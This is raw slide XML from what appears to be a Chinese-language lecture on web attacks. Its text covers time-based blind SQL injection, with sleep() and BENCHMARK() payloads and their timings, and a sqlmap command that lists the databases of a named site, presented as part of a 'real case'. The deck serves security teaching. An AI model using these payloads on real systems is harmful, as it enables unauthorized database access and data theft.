                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>可以构造如下，这样只要执行成功就可根据时间长短判断是否执行了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2600">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>xajax=GetAdminEndChat&amp;xajaxargs[1]=1' and if(1＝1,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2600">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>如下图，这里设置1=1的条件是成立的，所以等待了5s后，最终等待时间为5035ms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="image23.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090964" y="2724278"/>
            <a:ext cx="8469587" cy="66172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24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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225"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="225"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="22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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482535" y="431799"/>
            <a:ext cx="11147853"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>假设条件改成 1=2  显然不成立，所以sleep(5)不会执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2600">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>xajax=GetAdminEndChat&amp;xajaxargs[1]=1' and if(1=2,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2600">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>最终等待时间为71ms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="image24.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835872" y="1873378"/>
            <a:ext cx="9050780" cy="7071295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625600" y="9207499"/>
            <a:ext cx="97155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800">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>基于时间的盲注，有时候会受服务器响应速度影响，往往和网络有关，所以有时候只能作为参考</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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="228" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4652435" y="1670049"/>
            <a:ext cx="402854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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Timing Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446086" y="3555205"/>
            <a:ext cx="12111040"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利用BENCHMARK()函数，可以让同一个函数执行若干次，使得结果返回的时间比平时长；通过时间长短的变化，可以判断注入语句是否执行成功。这是一种边信道攻击，这个技巧被称为Timing Attack</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31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12"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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="232"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image25.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312862" y="1939925"/>
            <a:ext cx="10377489" cy="5114925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513243" y="7599361"/>
            <a:ext cx="397672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15.29明显大于0.00</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2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_x+(cos(-2*pi*(1-$))*-#ppt_x-sin(-2*pi*(1-$))*(1-#ppt_y))*(1-$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23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 grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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P build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="235" grpId="2"/>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5530850" y="1916111"/>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一个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198437" y="3455987"/>
            <a:ext cx="1260637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1170 UNION SELECT IF (SUBSTRING(current,1,1) = CHAR(119) ,BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds ’)), null) FROM (Select Database() as current) as tbl;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423861" y="5841998"/>
            <a:ext cx="12155490"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这个payload判断库名是否第一个字母为char（119），即小写的w，若是，则会通过BENCHMARK造成较长的延时，否则会很快执行完，攻击者遍历所有的字母，直到将整个数据库名全部验证完。</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xfrm>
            <a:off x="838198" y="469899"/>
            <a:ext cx="11783470" cy="1242320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="420623">
              <a:defRPr sz="5700"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>从一个真实的案例来讲Web攻击流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965302" y="4210050"/>
            <a:ext cx="5529264" cy="1807219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="147923" indent="-147923" defTabSz="193910">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2856"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http://192.168.166.208:808</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="147923" indent="-147923" defTabSz="193910">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2856">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>杭州电子科技大学数学建模</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="147923" indent="-147923" defTabSz="193910">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2856"/>
            </a:pPr>
            <a:r>
              <a:t>测试日期7月7日</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40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="41" grpId="2"/>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5504495" y="2413000"/>
            <a:ext cx="1994223"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SQLmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976311" y="3765549"/>
            <a:ext cx="11050590"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SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370243" y="7010400"/>
            <a:ext cx="9774918"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600">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>该工具已经集成在Kali Linux系统，Windows下使用需Python环境</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5" name="image26.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="936625" y="1352550"/>
            <a:ext cx="11607800" cy="5351463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Shape 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1929909" y="7370761"/>
            <a:ext cx="962122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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://www.sysorem.xyz/test.php?id=3”  —dbs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730875" y="8150225"/>
            <a:ext cx="20193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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>得到数据库名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="image27.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="9801346">
            <a:off x="3111500" y="5732462"/>
            <a:ext cx="2851150" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768975" y="4906167"/>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82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>数据库名</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3" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(horizontal)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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19" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="246"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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0" presetID="19" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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5" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="249"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="249"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="249"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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4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5" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
